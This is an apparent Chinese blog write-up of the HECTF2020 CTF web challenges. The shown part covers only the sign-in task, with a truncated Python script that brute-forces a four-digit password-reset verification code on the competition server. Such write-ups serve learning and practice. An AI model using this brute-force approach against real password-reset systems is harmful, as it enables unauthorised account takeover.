HECTF2020web部分题wp

本文详细介绍了HECTF2020网络安全比赛中的Web部分挑战,包括签到的验证码破解、ezphp的MD5碰撞、ssrfme的0.0.0.0利用、xiazhu的时间盲注以及web1的文件操作。通过源码分析和漏洞利用,逐步揭示了解题过程和技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


这两周太忙了,考试和实验都堆在一起了,人没了。上周末抽空做了一下HECTF,签到关机一气呵成。

签到

在这里插入图片描述点一下忘记密码
在这里插入图片描述然后就输入手机号,并输入四位验证码。手机号可以在登陆界面的注释中找到,这里说是四位数验证码,那就应该是爆破了。菜鸡的脚本附上

import requests

url1='http://121.196.32.184:8080/findpass.php?num=15970773575&check='
url2='&next=%E4%B8%8B%E4%B8%80%E6%AD%A5'

for i in range(0,10):
    for j in range(0,10):
        for k in range(0,10):
            for l in range(0,10):
                pay=str(i)+str(j)+str(k)+str(l)
                url=url1+pay+url2
                res=requests.get(url)
                if<
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值